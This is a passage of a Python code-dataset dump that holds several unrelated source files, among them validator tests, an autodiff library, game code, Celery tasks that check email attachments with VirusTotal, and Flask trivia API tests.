strict=False)\n@valid(name='tango:alias')\n@valid(name='tango://alias', strict=False)\n@valid(name='tango://a/b/c', strict=False)\n@invalid(name='tango:foo:1234/alias', strict=False)\n@invalid(name='tango:foo:1234/a/b/c', strict=False)\n@valid(name='foo:1234/alias', strict=False)\n@valid(name='foo:1234/a/b/c', strict=False)\n@invalid(name='tango://a/b/c', strict=True)\n@invalid(name='tango://devalias')\n@names(name='tango://foo:123/a/b/c', out=('tango://foo:123/a/b/c', '//foo:123/a/b/c',\n 'a/b/c'))\n@names(name='tango:sys/tg_test/1', out=(\n 'tango://%s/sys/tg_test/1' % __TANGO_HOST,\n 'sys/tg_test/1', 'sys/tg_test/1'))\n@names(name='tango:alias', out=(None, None, 'alias'))\nclass TangoDevValidatorTestCase(AbstractNameValidatorTestCase, unittest.TestCase):\n validator = TangoDeviceNameValidator\n\n\n@valid(name='foo:10000/a/b/c/d', strict=False)\n@valid(name='mot/position', strict=False)\n@valid(name='tango:a/b/c/d', groups={'devname': 'a/b/c', 'attrname': 'a/b/c/d', \n '_shortattrname': 'd'})\n@valid(name='tango:alias/attr', groups={'devname': 'alias', '_devalias': 'alias', \n 'attrname': 'alias/attr', \n '_shortattrname': 'attr'})\n@valid(name='tango://a/b/c/d', strict=False)\n@valid(name='tango://alias/attr', 
strict=False)\n@invalid(name='tango://a/b/c/d')\n@invalid(name='tango://a/b/c/')\n@invalid(name='tango://alias/attr')\n@invalid(name='tango://a/b/c/d?')\n@invalid(name='tango:a/b/c')\n@invalid(name='tango:sys/tg_test/1')\n@names(name='tango://foo:123/a/b/c/d', out=('tango://foo:123/a/b/c/d', '//foo:123/a/b/c/d',\n 'd'))\n@names(name='tango:sys/tg_test/1/float_scalar', out=(\n 'tango://%s/sys/tg_test/1/float_scalar' % __TANGO_HOST,\n 'sys/tg_test/1/float_scalar', 'float_scalar'))\n@valid(name='tango:a/b/c/d#', groups={'devname': 'a/b/c', 'attrname': 'a/b/c/d', '_shortattrname': 'd', 'cfgkey': ''})\n@valid(name='tango:a/b/c/d#label', groups={'devname': 'a/b/c', 'attrname': 'a/b/c/d', '_shortattrname': 'd', 'cfgkey': 'label'})\n@valid(name='tango:alias/attr#')\n@valid(name='tango:alias/attr#label')\n@valid(name='tango://a/b/c/d?configuration', strict=False)\n@valid(name='tango://a/b/c/d?configuration=label', strict=False, groups={'devname': 'a/b/c', 'attrname': 'a/b/c/d', \n '_shortattrname': 'd', \n 'cfgkey': 'label', \n 'fragment': 'label'})\n@invalid(name='tango://a/b/c/d#')\n@invalid(name='tango://a/b/c/d?foo', strict=False)\n@invalid(name='tango://a/b/c/d?foo=label', strict=False)\n@valid(name='tango:a/b/c/d#?foo=label')\n@valid(name='tango:a/b/c/d#label?foo=bar')\n@names(name='tango://foo:123/a/b/c/d#', out=('tango://foo:123/a/b/c/d', '//foo:123/a/b/c/d',\n 'd', ''))\n@names(name='tango://foo:123/a/b/c/d#label', out=('tango://foo:123/a/b/c/d', '//foo:123/a/b/c/d',\n 'd', 'label'))\n@names(name='tango:sys/tg_test/1/float_scalar#', out=(\n 'tango://%s/sys/tg_test/1/float_scalar' % __TANGO_HOST,\n 'sys/tg_test/1/float_scalar', 'float_scalar', ''))\n@names(name='tango://foo:123/a/b/c/d?configuration=label', out=('tango://foo:123/a/b/c/d',\n '//foo:123/a/b/c/d',\n 'd', 'label'))\nclass TangoAttrValidatorTestCase(AbstractNameValidatorTestCase, unittest.TestCase):\n validator = TangoAttributeNameValidator\n\n\nif __name__ == '__main__':\n pass","sub_path":"pycfiles/taurus-4.6.1-py2.7/test_tangovalidator.py","file_name":"test_tangovalidator.py","file_ext":"py","file_size_in_byte":5197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"643518112","text":"#! /usr/bin/python3\n\n###! Python Class Inheritance\n\n##? Creating parent class (normal class)\nclass Person:\n def __init__(self, fname, lname):\n self.firstname = fname\n self.lastname = lname\n\n def printname(self):\n print(self.firstname, self.lastname)\n\n# Use the Person class to create an object, and then execute the printname method:\nx = Person(\"John\", \"Doe\")\nx.printname()\n\n\n\n##? Creating a child class\n# * child class inherits the functionality from another class\n# * we declare the parent class as a parameter when creating the child class\nclass Student(Person):\n pass\n\n# Now, the student class can execute the printname method: \nz = Student(\"Mike\", \"Olsen\")\nz.printname()\n\n\n\n##? Adding the __init__() function to child class\nclass Tapster(Person):\n def __init__(self, fname, lname): # * The child's __init__() function OVERRIDES the inheritance if parent's __init__() function\n # To keep the inheritance of the parent's __init__() function, add a call to the parent's __init__() function:\n Person.__init__(self, fname, lname)\n\nc = Tapster(\"Duke\", \"Nukem\")\nc.printname()\n\n\n\n\n##? 
Using the super() function and adding properties\n# * It makes the child class inherit all the methods and properties from its parent\n# * By using the super() function you do not have to use the name of the parent class\nclass Builder(Person):\n    def __init__(self, fname, lname, year):\n        super().__init__(fname, lname)\n        self.yearOfBorn = year\n\nv = Builder(\"Bob\", \"Builder\", \"1963\")\nprint(v.yearOfBorn)\n\n\n\n##? Adding methods\nclass Woman(Person):\n    def __init__(self, fname, lname, year):\n        super().__init__(fname, lname)\n        self.yearOfBorn = year\n\n    def welcome(self):\n        print(\"Welcome\", self.firstname, self.lastname, \"you are a woman born in\", self.yearOfBorn)\n\nb = Woman(\"Jadwiga\", \"Agiwdaj\", \"1915\")\nprint(b.yearOfBorn)\nb.welcome()\n\n","sub_path":"basics/class_inheritance_parent_and_child_class_super().py","file_name":"class_inheritance_parent_and_child_class_super().py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"119178412","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport csv\n\ntijd = []\nauto1 = []\nauto2 = []\nauto3 = []\nwith open(\"verkeerssimulatie-rechteweg-snelheden.csv\") as csvfile:\n    reader = csv.reader(csvfile, delimiter=\";\")\n    for regel in reader:\n        tijd.append(float(regel[0]))\n        auto1.append(float(regel[1]))\n        auto2.append(float(regel[2]))\n        auto3.append(float(regel[3]))\ntijd.pop(0)\nx= tijd\np1 = auto1.pop(0)\np2 = auto2.pop(0)\np3 = auto3.pop(0)\nprint(p1,p2,p3)\npositie1 = [np.trapz(auto1[0:i+2],tijd[0:i+2]) + p1 for i in range(len(tijd)-1)]\npositie2 = [np.trapz(auto2[0:i+2],tijd[0:i+2]) + p2 for i in range(len(tijd)-1)]\npositie3 = [np.trapz(auto3[0:i+2],tijd[0:i+2]) + p3 for i in range(len(tijd)-1)]\n\n\nb1 =121\nb2 =121\nb3 =121\nv = 0\nfor x in range(len(tijd)-1):\n    if (positie2[v]+1) >= (positie1[v]-1) and b1 > tijd[v]:\n        b1 = tijd[v]\n        print(\"Er is een botsing plaatsgevonden tussen auto 1 en auto 2 om {}\\n\".format(b1))\n    if (positie3[v]+1) >= (positie1[v]-1) and b2 > tijd[v]:\n        b2 = tijd[v]\n        print(\"Er is een botsing plaatsgevonden tussen auto 1 en auto 3 om {}\\n\".format(b2))\n    if (positie2[v]+1) >= (positie3[v]-1) and b3 > tijd[v]:\n        b3 = tijd[v]\n        # this branch compares car 2 and car 3, so the message names those two cars\n        print(\"Er is een botsing plaatsgevonden tussen auto 2 en auto 3 om {}\\n\".format(b3))\n    v+=1\n\nplt.plot(positie1,'r')\nplt.plot(positie2,'g')\nplt.plot(positie3,'b')\nplt.axis([0, 1200, -10,950])\nplt.show()\n\n","sub_path":"VerkeersimulatieRechteWeg/Verkeerd__Snelheid-VerkeersimulatieRechteWeg.py","file_name":"Verkeerd__Snelheid-VerkeersimulatieRechteWeg.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"135099974","text":"from mUnit import UNIT_NONE, UNIT_SOLDIER, UNIT_BASE, UNIT_WORKER, UNITS, UNIT_RES\nimport mMap\n\nmap1 = {'length': 20,\n\t\t'heigth': 20,\n\t\t'default': UNIT_NONE,\n\t\t'data': {\n\t\t\t(1, 2): UNIT_SOLDIER,\n\t\t\t(1, 3): UNIT_SOLDIER,\n\t\t\t(3, 2): UNIT_BASE,\n\t\t\t(5, 4): UNIT_RES,\n\t\t\t(6, 5): UNIT_WORKER,\n\t\t\t#(4, 3): UNIT_BASE,\n\t\t\t(15, 16): UNIT_BASE,\n\t\t\t(18, 16): UNIT_RES,\n\t\t\t(18, 17): UNIT_WORKER,\n\t\t},\n\t}\n\nmap2 = {'length': 12,\n\t\t'heigth': 12,\n\t\t'default': UNIT_NONE,\n\t\t'data': {\n\t\t\t(2, 1): UNIT_WORKER,\n\t\t\t(3, 1): UNIT_BASE,\n\t\t\t(1, 1): UNIT_RES,\n\t\t\t#(4, 3): UNIT_BASE,\n\t\t\t(8, 10): UNIT_BASE,\n\t\t\t(10, 10): UNIT_RES,\n\t\t\t(9, 10): UNIT_WORKER,\n\t\t},\n\t}\n\t\nmap3 = {'length': 
6,\n\t\t'heigth': 6,\n\t\t'default': UNIT_NONE,\n\t\t'data': {\n\t\t\t(1, 1): UNIT_BASE,\n\t\t\t(0, 0): UNIT_RES,\n\t\t\t#(4, 3): UNIT_BASE,\n\t\t\t(4, 4): UNIT_BASE,\n\t\t\t(5, 5): UNIT_RES,\n\t\t\t#(5, 1): UNIT_WORKER,\n\t\t},\n\t}\n\nmap4 = {'length': 8,\n\t\t'heigth': 8,\n\t\t'default': UNIT_NONE,\n\t\t'data': {\n\t\t\t(1, 1): UNIT_BASE,\n\t\t\t(0, 0): UNIT_RES,\n\t\t\t#(4, 3): UNIT_BASE,\n\t\t\t(6, 6): UNIT_BASE,\n\t\t\t(7, 7): UNIT_RES,\n\t\t\t#(5, 1): UNIT_WORKER,\n\t\t},\n\t}\n\ndef init_map(map_data):\n\t_map = mMap.mMap(map_data)\n\tif map_data == map1:\n\t\t_unit2 = _map[15][16]\n\t\t_unit2.camp_ = 1\n\t\t_unit4 = _map[18][16]\n\t\t_unit4.camp_ = 1\n\t\t_unit4 = _map[18][17]\n\t\t_unit4.camp_ = 1\n\telif map_data == map2:\n\t\t_unit2 = _map[8][10]\n\t\t_unit2.camp_ = 1\n\t\t_unit4 = _map[9][10]\n\t\t_unit4.camp_ = 1\n\t\t_unit3 = _map[10][10]\n\t\t_unit3.camp_ = 1\n\telif map_data == map3:\n\t\t_unit2 = _map[4][4]\n\t\t_unit2.camp_ = 1\n\t\t_unit4 = _map[5][5]\n\t\t_unit4.camp_ = 1\n\telif map_data == map4:\n\t\t_unit2 = _map[6][6]\n\t\t_unit2.camp_ = 1\n\t\t_unit4 = _map[7][7]\n\t\t_unit4.camp_ = 1\n\treturn _map\n\nmaps = {\n\t'map1': init_map(map1),\n\t'map2': init_map(map2),\n\t'map3': init_map(map3),\n\t'map4': init_map(map4),\n}\n","sub_path":"rts/mData.py","file_name":"mData.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"545059438","text":"from .ad import *\nfrom .ad import ADF, _get_variables, to_auto_diff, _apply_chain_rule, _is_constant, constant, null, get_order, set_order\nfrom .ad import admath\n\nimport numpy as np\nfrom numbers import Number\nimport scipy, scipy.signal, scipy.sparse\nfrom scipy.sparse.linalg import expm_multiply\n\ndef _make_derivs_dicts():\n if get_order() == 1:\n # no cross terms\n return {}, {}, None\n elif get_order() == 2:\n # dictionaries for first order, second order, cross terms\n return {}, {}, {}\n\ndef array(x):\n if isinstance(x, ADF):\n return x\n\n if isinstance(x, Number):\n return constant(x)\n\n if not isinstance(x, np.ndarray):\n x = np.asarray(x)\n\n if np.issubdtype(x.dtype, np.number):\n return constant(x)\n\n # get the variables to differentiate against\n adentries = []\n for i,xi in np.ndenumerate(x):\n if isinstance(xi, ADF):\n adentries.append((i,xi))\n elif not isinstance(xi,Number):\n raise TypeError(str((i,xi)))\n variables = _get_variables([xi for _,xi in adentries])\n\n # initialize the dictionaries of derivatives\n d_dicts = lc,qc,cp = _make_derivs_dicts()\n d_dicts = [d for d in d_dicts if d is not None]\n\n if variables:\n # fill the dictionaries of derivatives\n for i,xi in adentries:\n for xi_d, x_d in zip((xi._lc, xi._qc, xi._cp)[:len(d_dicts)], d_dicts):\n for k in xi_d:\n if k not in x_d:\n x_d[k] = np.zeros(x.shape)\n x_d[k][i] = xi_d[k]\n\n x_old = x\n x = np.zeros(x.shape)\n for i,xi in np.ndenumerate(x_old):\n if isinstance(xi,ADF):\n x[i] = xi.x\n elif isinstance(xi, Number):\n x[i] = xi\n else:\n raise Exception\n\n return ADF(x, lc, qc, cp)\n\n\n'''add array functionality to ADF'''\n\n'''add shape and length to ADF'''\n@property\ndef ad_shape(self):\n return self.x.shape\n\ndef ad_len(self):\n return self.x.__len__()\n\nADF.shape = ad_shape\nADF.__len__ = ad_len\n\n''' apply f to x and all its derivatives '''\ndef ad_apply(self, f, *args, **kwargs):\n ret_x = f(self.x, *args, **kwargs)\n if self._lc is null:\n return constant(ret_x)\n\n d_dicts = lc, qc, cp = _make_derivs_dicts()\n d_dicts = [d for d 
in d_dicts if d is not None]\n for ret_d, x_d in zip(d_dicts, (self._lc, self._qc, self._cp)[:len(d_dicts)]):\n for v in x_d:\n ret_d[v] = f(x_d[v], *args, **kwargs)\n return ADF(ret_x, lc, qc, cp)\n\nADF.apply = ad_apply\n\n''' __getitem__ and __setitem__'''\ndef ad_getitem(self, *args, **kwargs):\n return self.apply(np.ndarray.__getitem__, *args, **kwargs)\n\ndef ad_setitem(self, key, value):\n if not _is_constant(key):\n ## TODO: implement non-constant case!\n raise NotImplementedError\n self.x[key] = value\n for derivatives in (self._lc, self._qc, self._cp):\n if derivatives is not None:\n for direction in derivatives:\n derivatives[direction][key] = 0.0\n\nADF.__getitem__ = ad_getitem\nADF.__setitem__ = ad_setitem\n\n\n''' sum function and method '''\ndef sum(x, *args, **kwargs):\n if isinstance(x, ADF):\n return x.apply(np.sum, *args, **kwargs)\n return np.sum(x, *args, **kwargs)\n\ndef adarray_sum(self, *args, **kwargs):\n return self.apply(np.ndarray.sum, *args, **kwargs)\n\nADF.sum = adarray_sum\n\n\n''' truncates things within numerical precision of 0, but keeps the derivatives'''\ndef truncate(x, level=1e-16):\n assert x.x > -level\n if isinstance(x.x, Number):\n x.x = max(x.x,0.0)\n else:\n x.x[x.x < 0.0] = 0.0\n\n\n\n''' implements product rule for multiplication-like operations, e.g. matrix/tensor multiplication, convolution'''\ndef ad_product(prod):\n def f(a,b, *args, **kwargs):\n if not isinstance(a, ADF) and not isinstance(b, ADF):\n return prod(a,b)\n\n a,b = to_auto_diff(a), to_auto_diff(b)\n x = prod(a.x,b.x, *args, **kwargs)\n\n variables = _get_variables([a,b])\n if not variables:\n return constant(x)\n\n lc, qc, cp = _make_derivs_dicts()\n for i,v in enumerate(variables):\n lc[v] = prod(a.d(v), b.x, *args, **kwargs) + prod(a.x, b.d(v),*args,**kwargs)\n qc[v] = prod(a.d2(v), b.x, *args, **kwargs ) + 2 * prod(a.d(v), b.d(v), *args, **kwargs) + prod(a.x, b.d2(v), *args, **kwargs)\n if get_order() == 2:\n for j,u in enumerate(variables):\n if i < j:\n cp[(v,u)] = prod(a.d2c(u,v), b.x, *args, **kwargs) + prod(a.d(u), b.d(v), *args, **kwargs) + prod(a.d(v) , b.d(u), *args, **kwargs) + prod(a.x, b.d2c(u,v), *args, **kwargs)\n return ADF(x, lc, qc, cp)\n return f\n\n'''matrix multiplication, tensor multiplication, and convolution (Fourier domain multiplication)'''\ndot = ad_product(np.dot)\ntensordot = ad_product(np.tensordot)\n#fftconvolve = ad_product(scipy.signal.fftconvolve)\nfftconvolve = ad_product(np.convolve)\nouter = ad_product(np.outer)\n\n\ndef diag(x):\n try:\n return x.apply(np.diag)\n except:\n return np.diag(x)\n\n'''A is a constant sparse matrix.\nReturns a function f(t,b) = exp(t*A) \\dot b'''\ndef ad_expm_multiply(A):\n def func(t, b):\n if not isinstance(t, ADF) and not isinstance(b, ADF):\n return expm_multiply(t*A, b)\n t,b = to_auto_diff(t), to_auto_diff(b)\n \n if not isinstance(t.x, Number) and len(t) > 1:\n raise Exception(\"t must be a scalar\")\n\n At = t.x * A\n x = expm_multiply(At, b.x)\n\n variables = _get_variables([t,b])\n if not variables:\n return constant(x)\n\n Ax = A.dot(x)\n AAx = A.dot(Ax)\n lc, qc, cp = _make_derivs_dicts()\n\n b_derivs = {} # stores expm_multiply(At, b.d(v))\n for i,v in enumerate(variables):\n b_derivs[v] = expm_multiply(At, b.d(v))\n lc[v] = Ax * t.d(v) + b_derivs[v]\n\n # replace with A * exp(At) * b.dv\n b_derivs[v] = A.dot(b_derivs[v])\n qc[v] = AAx * t.d(v) * t.d(v) + Ax * t.d2(v) + 2 * t.d(v) * b_derivs[v] + expm_multiply(At, b.d2(v))\n\n if get_order() == 2:\n for i, v in enumerate(variables):\n for j,u in 
enumerate(variables):\n                    if i < j:\n                        cp[(v,u)] = AAx * t.d(u) * t.d(v) + Ax * t.d2c(u,v) + t.d(u) * b_derivs[v] + t.d(v) * b_derivs[u] + expm_multiply(At, b.d2c(u,v))\n        return ADF(x, lc, qc, cp)\n    return func\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"543460652","text":"import pygame\nimport random\nfrom nlc_dino_runner.components.obstacles.bird import Bird\nfrom nlc_dino_runner.components.obstacles.cactus import Cactus\nfrom nlc_dino_runner.components.obstacles.cactus_large import CactusLarge\nfrom nlc_dino_runner.utils.constants import SMALL_CACTUS, SHIELD_TYPE, BIRD, LARGE_CACTUS\n\n\nclass ObstaclesManager:\n\n    def __init__(self):\n        self.obstacles_list = []\n\n    def update(self, game):\n        if len(self.obstacles_list) == 0:\n            # draw the obstacle type once; re-rolling randint in every branch\n            # could leave some updates without spawning any obstacle at all\n            obstacle_type = random.randint(0, 2)\n            if obstacle_type == 0:\n                self.obstacles_list.append(Cactus(SMALL_CACTUS))\n            elif obstacle_type == 1:\n                self.obstacles_list.append(Bird(BIRD))\n            else:\n                self.obstacles_list.append(CactusLarge(LARGE_CACTUS))\n\n        for obstacle in self.obstacles_list:\n            obstacle.update(game.game_speed, self.obstacles_list)\n            if game.player.hammer and game.player.hammer.rect.colliderect(obstacle.rect):\n                self.obstacles_list.remove(obstacle)\n            if game.player.dino_rect.colliderect(obstacle.rect):\n                if game.player.shield:\n                    self.obstacles_list.remove(obstacle)\n                else:\n                    if game.lives_manager.lives > 1:\n                        game.lives_manager.reduce_lives()\n                        game.player.shield = True\n                        game.player.type = SHIELD_TYPE\n                        start_time = pygame.time.get_ticks()\n                        game.player.shield_time_up = start_time + 2500\n                    else:\n                        pygame.time.delay(500)\n                        game.playing = False\n                        game.death_count += 1\n                        break\n\n    def draw(self, screen):\n        for obstacle in self.obstacles_list:\n            obstacle.draw(screen)\n\n    def reset_obstacles(self):\n        self.obstacles_list = []\n","sub_path":"nlc_dino_runner/components/obstacles/obstaclesManager.py","file_name":"obstaclesManager.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"545806628","text":"from source.utilities.helpers import Helpers\nfrom source.models.range_symbol import RangeSymbol\nfrom enum import Enum, auto\n\nclass ValueBlockType(Enum):\n    ATTRIBUTE = auto()\n    DECISION = auto()\n\nclass ValueBlock:\n\n    def __init__(self, valueBlockType, item, value):\n        self.type = valueBlockType\n        self.item = item\n        self.value = value\n        self.block = None # Lazily assigned by getBlock.\n\n    def __eq__(self, other):\n        if isinstance(other, ValueBlock):\n            return self.item == other.item and self.value == other.value\n        return False\n\n    def __hash__(self):\n        hash = 0\n\n        if self.item is not None:\n            hash += self.item.__hash__()\n\n        if self.value is not None:\n            hash += self.value.__hash__()\n\n        return hash\n\n    def copy(self):\n        copy = ValueBlock(valueBlockType = self.type, item = self.item, value = None)\n\n        if isinstance(self.value, RangeSymbol):\n            copy.value = self.value.copy()\n        else:\n            copy.value = self.value\n\n        if self.block is not None:\n            copy.block = self.block.copy()\n        \n        return copy\n\n    def toString(self, records):\n        return '[({}, {})] = {}'.format(self.item, self.value, self.getBlock(records))\n\n    def getBlock(self, records):\n\n        # Check for precomputed block.\n        if self.block is not None:\n            return self.block\n\n        # Create [t]\n        block = set()\n        for record in records:\n            recordItemValue = record.itemValues[self.item]\n\n            
# Case: the value block is of type ATTRIBUTE.\n if self.type == ValueBlockType.ATTRIBUTE:\n\n # Case: attribute value is a Range Symbol and the record's attribute value is numeric.\n if Helpers.isNumber(recordItemValue) and type(self.value) is RangeSymbol:\n if self.value.containsValue(float(recordItemValue)):\n block.add(record.id)\n\n # Case: attribute value is Standard Symbol and the record's attribute value is non-numeric.\n elif not Helpers.isNumber(recordItemValue) and type(self.value) is not RangeSymbol:\n if recordItemValue == self.value:\n block.add(record.id)\n\n # Case: the value block is of type DECISION.\n elif self.type == ValueBlockType.DECISION:\n if recordItemValue == self.value:\n block.add(record.id)\n \n # Return [t]\n self.block = block\n return block\n\n","sub_path":"mlem2/source/models/value_block.py","file_name":"value_block.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"28483764","text":"from __future__ import absolute_import, unicode_literals\n\nimport json\nimport requests\n\nfrom .verification import *\n\nfrom .utils import *\nfrom .models import File, Message\n\nfrom db.core import Connection\nfrom django.db.models import Q\nfrom unidecode import unidecode\nfrom django.conf import settings\nfrom celery import shared_task, Task\nfrom settings.models import Setting, Table\n\n\nclass BaseTask(Task):\n abstract = True\n\n def on_failure(self, exc, task_id, args, kwargs, einfo):\n send_failure(exc, task_id, einfo, self.name)\n\n\n@shared_task(bind=True, name='Get report from VirusTotal', base=BaseTask)\ndef get_report(self, *args, **kwargs):\n setting = Setting.objects.get()\n obj_id, message_id, resource = args\n params = {'apikey': setting.api_key,\n 'resource': resource}\n r = requests.get(settings.URLS['REPORT'],\n params=params,\n headers=settings.HEADERS)\n\n if r.status_code != 200:\n try:\n raise ValueError(r.status_code)\n except Exception as exc:\n self.retry(countdown=300, exc=exc, max_retries=30)\n json_r = r.json()\n if int(json_r['response_code']) != 1:\n try:\n raise ValueError(json_r)\n except Exception as exc:\n self.retry(countdown=300, exc=exc, max_retries=30)\n c = Connection.create()\n try:\n message = Message.objects.get(pk=message_id)\n file = File.objects.get(id=obj_id)\n file.response_result = json.dumps(json_r)\n file.checked = True\n if int(json_r['positives']) >= setting.threshold:\n file.infected = True\n file.save()\n c.push_message(message, False)\n reason = 'Virustotal recognized %s as a virus' % \\\n file.file\n message.reason = reason\n send_alert(file.file,\n message.table,\n message.client,\n url=json_r['permalink'],\n reason=reason\n )\n return\n file.save()\n if not File.objects.filter(Q(message_id=message_id) & (\n Q(checked=False) | Q(infected=True))).count():\n c.push_message(message, True)\n message.pushed = True\n message.save()\n except Exception as exc:\n self.retry(countdown=300, exc=exc, max_retries=2)\n finally:\n c.disconnect()\n\n\n@shared_task(bind=True, name='Send to virustotal', base=BaseTask)\ndef send_file(self, file, payload, client_id, message_id, *args, **kwargs):\n setting = Setting.objects.get()\n files = {\n 'file': (unidecode(file), payload)\n }\n r = requests.post(\n settings.URLS['SCAN'],\n files=files,\n params={'apikey': setting.api_key},\n )\n if r.status_code != 200:\n try:\n raise ValueError(r.status_code)\n except Exception as exc:\n self.retry(countdown=300, exc=exc, max_retries=30)\n json_r = 
r.json()\n if int(json_r['response_code']) != 1:\n try:\n raise ValueError(json_r)\n except Exception as exc:\n self.retry(countdown=300, exc=exc, max_retries=30)\n try:\n obj, _ = File.objects.get_or_create(\n file=file,\n client_id=client_id,\n hash=json_r['sha256']\n )\n obj.checked = False\n obj.response_post = json.dumps(json_r)\n obj.message_id = message_id\n obj.save()\n get_report.apply_async((obj.id,\n message_id,\n json_r['resource']),\n countdown=120)\n except Exception as exc:\n self.retry(countdown=300, exc=exc, max_retries=2)\n\n\n@shared_task(bind=True,\n name='Search of new docs with attachments',\n base=BaseTask)\ndef scan_db_attachments(self, *args, **kwargs):\n c = Connection.create()\n tables = Table.objects.filter(enabled=True)\n for table in tables:\n rows = c.scan_for_attachments(table)\n #rows = c.cursor.fetchall()\n for row in rows[3]:\n obj, created = Message.objects.get_or_create(client=row[0],\n datecreate=row[1],\n timecreate=row[2],\n table=table)\n if created:\n attachments = c.fetch_attachments(obj)\n Verifier().check(attachments, obj)\n c.disconnect()\n\n\n@shared_task(bind=True,\n name='Push docs with no attachments to finish status',\n base=BaseTask)\ndef push_docs_to_status(self, *args, **kwargs):\n c = Connection.create()\n tables = Table.objects.filter(enabled=True)\n for table in tables:\n c.push_to_accepted(table)\n c.disconnect()\n","sub_path":"viruscheck/virustotal/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":4894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"623066899","text":"#!/usr/bin/env python3\n\n# Copyright (c) Facebook, Inc. and its affiliates.\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\n\n\"\"\"\n.. 
include:: README.md\n\"\"\"\n__docformat__ = \"restructuredtext\"\n\n__all__ = [\n \"architect\",\n \"blueprint\",\n \"crowd_provider\",\n \"database\",\n \"architects\",\n \"blueprints\",\n \"providers\",\n \"databases\",\n]\n","sub_path":"mephisto/abstractions/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"12290051","text":"import os\nimport unittest\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom flaskr import create_app\nfrom models import setup_db, Question, Category\n\n\nclass TriviaTestCase(unittest.TestCase):\n \"\"\"This class represents the trivia test case\"\"\"\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"trivia_test\"\n self.database_path = \"postgres://postgres:131252118@{}/{}\".format('localhost:5432', self.database_name)\n setup_db(self.app, self.database_path)\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()\n \n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n \"\"\"\n TODO\n Write at least one test for each test for successful operation and for expected errors.\n \"\"\"\n def test_successful_get_questions(self):\n res = self.client().get('/questions?page=1')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code,200)\n self.assertEqual(data['success'],True)\n self.assertTrue(data['questions'])\n self.assertTrue(data['categories'])\n self.assertTrue(data['total_questions'])\n\n def test_unsuccessful_questions_get_request(self):\n res = self.client().get('/questions?page=100')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code,404)\n self.assertEqual(data['success'],False)\n self.assertEqual(data['message'],'Page Not Found')\n\n def test_successful_get_categories(self):\n res = self.client().get('/categories')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code,200)\n self.assertEqual(data['success'],True)\n self.assertTrue(data['categories'])\n \n def test_unsuccessful_categories_get_request(self):\n res = self.client().get('/categories/10')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code,404)\n self.assertEqual(data['success'],False)\n self.assertEqual(data['message'],'Page Not Found')\n\n def test_successful_questions_delete_request(self):\n question = Question(question='Test Question', answer='Test answer', difficulty=4, category=5)\n question.insert()\n res = self.client().delete(f'/questions/{question.id}')\n data = json.loads(res.data)\n\n question = Question.query.get(question.id)\n\n self.assertEqual(res.status_code,200)\n self.assertEqual(data['success'],True)\n self.assertTrue(data['question'])\n\n def test_unsuccessful_questions_delete_request(self):\n res = self.client().delete('/questions/50')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code,422)\n self.assertEqual(data['success'],False)\n self.assertEqual(data['message'],'Unprocessable')\n\n def test_successful_create_question(self):\n question = {'question':'Test Question 2', 'answer':'Test answer 2', 'difficulty':3, 'category':2}\n res = self.client().post('/questions', json=question)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code,200)\n self.assertEqual(data['success'],True)\n \n def 
test_unsuccessful_questions_post_request(self):\n question = {'question':'Test Question 2', 'answer':'Test answer 2'}\n res = self.client().post('/questions', json=question)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code,422)\n self.assertEqual(data['success'],False)\n self.assertEqual(data['message'],'Unprocessable')\n\n def test_successful_search_question(self):\n searchTerm = {'searchTerm':'Test Question 2'}\n res = self.client().post('/questions/search', json=searchTerm)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code,200)\n self.assertEqual(data['success'],True)\n self.assertTrue(data['questions'])\n\n def test_unsuccessful_search_question(self):\n searchTerm = {'searchTerm':'15648'}\n res = self.client().post('/questions/search', json=searchTerm)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code,404)\n self.assertEqual(data['success'],False)\n self.assertEqual(data['message'], 'Page Not Found')\n\n def test_successful_get_question_by_category(self):\n res = self.client().get('/categories/2/questions')\n data = json.loads(res.data)\n questions = Question.query.filter(Question.category == 2)\n transformedQuestion = [question.format() for question in questions]\n\n self.assertEqual(res.status_code,200)\n self.assertEqual(data['success'],True)\n self.assertTrue(data['questions'])\n\n def test_unsuccessful_get_question_by_category(self):\n res = self.client().get('/categories/500/questions')\n data = json.loads(res.data)\n questions = Question.query.filter(Question.category == 500)\n transformedQuestion = [question.format() for question in questions]\n\n self.assertEqual(res.status_code,404)\n self.assertEqual(data['success'],False)\n self.assertEqual(data['message'], 'Page Not Found')\n\n def test_successful_quiz_play(self):\n quizQuestion = 